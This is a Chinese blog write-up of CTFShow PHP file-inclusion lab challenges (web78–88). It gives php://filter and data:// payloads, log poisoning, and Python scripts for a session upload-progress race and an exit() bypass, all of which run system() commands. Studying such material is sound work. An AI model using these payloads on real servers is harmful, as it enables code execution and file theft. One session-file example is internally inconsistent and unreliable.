CTFShow文件包含(web78-88)

最新推荐文章于 2024-08-04 04:30:19 发布
最新推荐文章于 2024-08-04 04:30:19 发布
阅读量3k 收藏 11
点赞数 2
分类专栏: CTF 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45551083/article/details/110259089
版权
本文详细介绍了CTF比赛中的文件包含漏洞利用,从web78到web88,涵盖php://input命令执行、大小写绕过、open_basedir限制的规避、session文件利用和条件竞争等技巧。重点讲解了如何通过php://filter、data协议、session上传进度等功能进行漏洞利用,并提供了通杀脚本和条件竞争的概念。
摘要由CSDN通过智能技术生成

web78

  1. php://input + POSTdata命令执行在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
  2. ?file=php://filter/convert.base64-encode/resource=flag.php

web79

  1. 大小写绕过str_replace

str_replace() 函数替换字符串中的一些字符(区分大小写)。

在这里插入图片描述
2. data://
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
在这里插入图片描述

web80

  1. 大小写绕过str_replace()
    open_basedir对system等函数无效
    在这里插入图片描述

  2. 用data协议之间include就不行,需要绕过open_basedir
    在这里插入图片描述
    可以绕过open_basedir读文件目录
    在这里插入图片描述
    似乎可以用 symlink()函数绕过open_basedir这个读文件?

    发现似乎没什么限制,DATA://就是不能用
    在这里插入图片描述
    在这里插入图片描述
    后来本地测试:
    小写data √
    大写 ×
    具体原因待补充,欢迎师傅们评论区补充在这里插入图片描述
    在这里插入图片描述

  3. 包含日志文件getshell
    在这里插入图片描述
    在这里插入图片描述

web81

:也过滤了,只能用日志getshell
在这里插入图片描述

在这里插入图片描述

web82-86

upload_progress

参考freebuf.com/news/202819.html

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

这个题目过滤了.,只能找一个不带.路径的文件,所以选择了session会话文件

session是以文件的形式保存的
php.ini中有个配置项–session.save_path= "";这个里面填写的路径,将会使session文件保存在该路径下。

session文件的命名格式是:sess_[PHPSESSID的值]。每一个文件,里面保存了一个会话的数据。其实只要使用代码$_SESSION['user_id'] = $value;就会促发php的session机制,结果往对应的session文件中写入一个值。

利用前要弄明白下面几个点:

  1. session文件默认路径
    默认路径:
    linux: /tmp 或 /var/lib/php/session
    Windows:C:\WINDOWS\Temp
  2. session文件名称
    默认文件名称是 sess_[PHPSESSID的值]
    ps: session.use_strict_mode默认值为0, 此时用户是可以自己定义Session ID
    比如,我们在Cookie里设置PHPSESSID=test,PHP将会在服务器上创建一个文件:/tmp/sess_TGAO
  3. session生成机制:
    a. 代码里面有session_start()在使用类似$_SESSION['user_id'] = $value;这样的操作时会创建session文件
    b. 如果session.auto_start=On ,则PHP在接收请求的时候会自动初始化Session,不再需要执行session_start(),但默认情况下,这个选项都是关闭的。
  4. 如何控制session文件内容
    a. session的key或者value等可控
    b.利用session.upload_progress
    session.upload_progress.enabled = on的配置下,upload_progress功能开始.意味着当浏览器向服务器上传一个文件时,php将会把此次文件上传的详细信息(如上传时间、上传进度,上传文件名等)存储在session当中 ,但是要注意session.upload_progress.cleanup = on配置,on表示当文件上传结束后,php将会立即清空对应session文件中的内容(可以利用条件竞争来读取)
    session.uoload_progress一些别的配置:
    session.upload_progress.prefix 默认值为upload_progress_
    session.upload_progress.name : The name of the key to be used in $_SESSION storing the progress information.Defaults to “PHP_SESSION_UPLOAD_PROGRESS”
    session.upload_progress.prefix = 'upload_progress_' session.upload_progress.name='PHP_SESSION_UPLOAD_PROGRESS'的条件下,上传文件:
    // PHPSESSION = test
<form action="upload.php" method="POST" enctype="multipart/form-data">
 <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
 <input type="file" name="file1" />
 <input type="file" name="file2" />
 <input type="submit" />
</form>
    就会在session的session[‘upload_progress_123’]中储存一些本次上传相关的信息,储存在/tmp/sess_test
    下图为php官方手册给的一个session upload_progress结构信息
    在这里插入图片描述

通杀脚本:

# -*- coding: utf-8 -*-
# @author:lonmar
import io
import requests
import threading

sessID = 'flag'
url = 'http://7920d625-4983-43eb-9d4f-335e57303fd0.chall.ctf.show/'


def write(session):
    while event.isSet():
        f = io.BytesIO(b'a' * 1024 * 50)
        response = session.post(
            url,
            cookies={'PHPSESSID': sessID},
            data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat *.php");?>'},
            files={'file': ('test.txt', f)}
        )


def read(session):
    while event.isSet():
        response = session.get(url + '?file=/tmp/sess_{}'.format(sessID))
        if 'test' in response.text:
            print(response.text)
            event.clear()
        else:
            print('[*]retrying...')


if __name__ == '__main__':
    event = threading.Event()
    event.set()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()

条件竞争

体会一下什么叫条件竞争

  • web82
    在这里插入图片描述

  • web83
    在这里插入图片描述

  • web84
    在这里插入图片描述

  • web85
    在这里插入图片描述

  • web86
    在这里插入图片描述

web87

利用php://filter绕过死亡exit

谈一谈php://filter的妙用@leavesongs

PHP的base64_decode方法并非严格模式,除了跳过填充字符==,别的字符,满足base64_reverse_table[ch]<0,也会跳过

static const short base64_reverse_table[256] = {
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -1, -1, -2, -2, -1, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
  -1, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, 62, -2, -2, -2, 63,
  52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -2, -2, -2, -2, -2, -2,
  -2,  0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14,
  15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -2, -2, -2, -2, -2,
  -2, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
  41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -2, -2, -2, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2,
  -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2, -2
};

也就是只有ASCII码值为43,45-47,65-90,97-122时,才有base64_reverse_table[ch]>=0,对应字符为 +, / , 0~9,a~z,A~Z,其余字符都会被跳过
如本题的 <?php die("大佬别秀了");?> 在base64_decode处理的时候可视为phpdie,
需要在后面补充两个字符aa (不能是==)

# -*- coding: utf-8 -*-
# @Time : 20.11.28 17:53
# @author:lonmar

import requests
import base64

url = 'http://2e85f1cf-fafb-44fd-b6f3-595ec787b4d2.chall.ctf.show/'

# php://filter/write=convert.base64-decode/resource=tmp.php
file = '%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%34%25%36%64%25%37%30%25%32%65%25%37%30%25%36%38%25%37%30'
payload = '<?php system("nl *.php");?>'
payload = base64.encodebytes(payload.encode('utf-8')).decode('utf-8')
payload = payload.replace('\n', '')
data = {
    'content': 'aa' + payload
}
print(data)
requests.post(url=url + '?file=' + file, data=data)
res = requests.get(url + 'tmp.php')
print(res.text)

web88

?file=data://text/plain;base64,PD9waHAgICBzeXN0ZW0oIm5sICoucGhwIik7

<?php system("nl *.php");

注意base64编码后不能有=,调整空格数量即可

lonmar~
关注
专栏目录
Base47:Kotlin编写的Base47编码器解码器,使用表情符号作为其字符集
02-05
Base47:Kotlin编写的Base47编码器解码器,使用表情符号作为其字符集
CTFshow 菜狗杯 部分wp
weixin_44770698的博客
02-04 2189
ctfshow 菜狗杯 web部分练习(暂时不全)
CTFshow 文件包含Web78-Web117
最新发布
dasdasdasvsdV的博客
08-04 318
注意用法,allow_url_fopen和allow_url_include都满足的时候才可以用常用场景:文件包含、文本包含。
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2722
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
某RSA
YUK_103的博客
03-02 899
题目如下所示: from Crypto.Util.number import getPrime,bytes_to_long from sympy import Derivative from fractions import Fraction from secret import flag p=getPrime(1024) q=getPrime(1024) e=65537 n=p*q z=Fra...
ctfshow学习记录-web入门(文件包含78-87)
龟速更新的九某人
07-04 1792
ctfshow学习记录-web入门(文件包含web78-87)
CTFshow web42 43 44 45 46 47
ChenD的学习笔记
11-09 821
CTFshow web42 web43 web44 web45 web46 web47
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
ctfshow-web41~60-WP
02-21
CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41至60题的解题思路与技术细节,尤其是题目41中的命令注入攻击。 ##...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web入门 78-88文件包含
Firebasky的博客
09-18 4203
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 848
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
CTFSHOW WEB入门 文件包含 web78-
sinat_41572027的博客
07-11 830
CTFSHOW WEB入门 文件包含 web78.79.80.81.87.88.116.117
ctfshow we入门 78-88文件包含 wp
Firebasky的博客
10-01 639
首先感谢ctfshow平台提供的题,需要越来越好 其实这些wp,自己早就写好了放在本地,因为懒了就不重新写博客啦 如果里面有不懂的或者错误的欢迎师傅们指出,共同学习。 链接:https://pan.baidu.com/s/1aIKPTjAXljUH0dsMExNSeg 提取码:m0kf 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7346
个人ctfshow刷题记录
CTFshow-命令执行
weixin_44770698的博客
06-25 3352
ctfshow-web 命令执行
c++ eclipse clion mingw-32写jni的dll
chenhuaijin123的博客
06-07 516
本次需求: 利用eclipse,clion,mingw-32在windows 10上为java1.8 32位写一个jni,实现简单的加法及打印字符串 重点:对c++,c的编译即将cpp文件编译成.o文件,修改生成的cpp文件,最后再编译成dll 参考文档:https://juejin.im/entry/5865d619ac502e006d5ee1e1 参考以上文档生成header文件等,我...
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值